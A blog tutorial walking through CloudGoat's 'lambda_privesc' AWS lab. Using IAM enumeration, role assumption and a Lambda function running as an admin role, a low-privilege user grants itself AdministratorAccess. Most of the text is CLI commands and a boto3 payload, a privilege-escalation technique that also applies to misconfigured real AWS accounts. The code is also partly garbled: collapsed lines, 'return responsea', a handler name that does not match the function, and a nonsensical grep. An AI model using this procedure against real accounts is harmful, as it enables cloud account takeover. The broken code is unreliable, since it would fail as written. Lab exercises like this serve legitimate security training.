[AWS-security]How to conduct lambda privilege escalation

Takahiro Oda
5 min readDec 29, 2021


What we will do in this article

Conduct lambda privilege escalation attack using CloudGoat

You can see how to set up an initial environment here

Senario: lambda_privesc


Starting as the IAM user Chris, the attacker discovers that they can assume a role that has full Lambda access and pass role permissions. The attacker can then perform privilege escalation to obtain full admin access.


Acquire full admin privileges.


step1 deploy

We need to deploy the scenario on AWS with this command

./cloudgoat.py  create lambda_privesc

You can see that the access and secret keys for Chris are provided.

I can see the new user in the console as well

step2 create a profile(Chris)

You can create a profile(Chris) using the access and secret keys in the previous step.

aws configure --profile Chris

step3 enumerate the policies

You can use AWS CLI commands

The attacker realizes they are able to list and assume IAM roles. There are two interesting IAM roles: lambdaManager and debug.

aws iam list-roles --profile Chris | grep ['debug':'lambdaManager']
aws iam list-attached-role-policies --role-name <role-name> --profile Chris
you can see debug-role has AdminAccess policy

step4 Review the details of attached policy to Chris

Lets check the details of attached policy to Chris

aws iam get-policy --policy-arn  arn:aws:iam::362364726861:policy/cg-lambdaManager-policy-cgidnt7ccq4w83 --profile Chris

So this is v1. Get the specific information about v1.

The attacker looks at the attached policies for the two IAM roles and realizes lambdaManager has full lambda access and pass role permissions and the debug role has full administrator privileges.

aws iam get-policy-version --policy-arn  arn:aws:iam::362364726861:policy/cg-lambdaManager-policy-cgidnt7ccq4w83  --version-id v1     --profile Chris

So what we can see is full lambda access and pass role permissions



So this means that attacker can escalate privileges by passing an existing IAM role to new Lambda function and run the code by invoking the function through the AWS API.This would give a user access to the privileges associated with any Lambda service role that exists in the account, which could range from no privilege escalation to full administrator access to the account.

The attacker then tries to assume each role but realizes that they only have sufficient privileges to assume the lambdaManager role, and that the debug role can only be assumed by a Lambda function.

I try to assume the debug role, but access is denied because of permission

aws sts assume-role --role-arn  <arn name> --role-session-name  <any new role name> --profile Chris

But if I try to assume the lambda role, I can see the credentials.

aws sts assume-role --role-arn arn:aws:iam::362364726861:role/cg-lambdaManager-role-cgidnt7ccq4w83 --role-session-name test_lambda --profile Chris

The attacker now leverages the lambdaManager role to perform a privilege escalation using a Lambda function.

step5 create a lambda function

lets configure the IAM credentail on AWS CLI first

In order to include the session token, you need to edit this file. It might look like this.

vi ~/.aws/credentials

Lets create a lambda function that will attach the admin policy to Chris

vi lambda_function.py

the attacker writes a script that will attach the administrator policy to the IAM user “Chris”.

The inside of the file looks like this. #Be careful about indentation.

import boto3def lambda_handler(event, context):client = boto3.client('iam')response = client.attach_user_policy(UserName = 'chris-cgidnt7ccq4w83', PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess')return responsea

Lets zip the file.

apk add zip
zip lamba_function.zip lambda_function.py

using the lambdaManager role, the attacker creates a Lambda function, specifying the code, and set the lambda execution role to the debug role.

run this command to create a lambda function called admin.

aws lambda create-function --function-name admin --runtime python3.6 --role arn:aws:iam::362364726861:role/cg-debug-role-cgidnt7ccq4w83 --handler lambda_function.lambda.handler --zip-file fileb://lamba_function.zip  --profile LambdaManager --region ap-northeast-1

step6 invoke the function

Attacker uses the lambdaManager role, the attacker invokes the Lambda function, causing the administrator policy to be attached to the “Chris” user and thus gaining full admin access.

Run this command to invoke the function

aws lambda invoke --function-name admin output.txt --profile LambdaManager --region ap-northeast-1

step7 check a new policy for Chris

run this command to check a new policy attached to Chris

aws iam list-attached-user-policies --user-name chris-cgidnt7ccq4w83 --profile Chris

If you see the created roles, you can see them.

step8 cleanup

Run this command to destroy the resources that are used in this article.

./cloudgoat.py destroy lambda_privesc
type ‘y’

After destroying, we don’t see Chris anymore.



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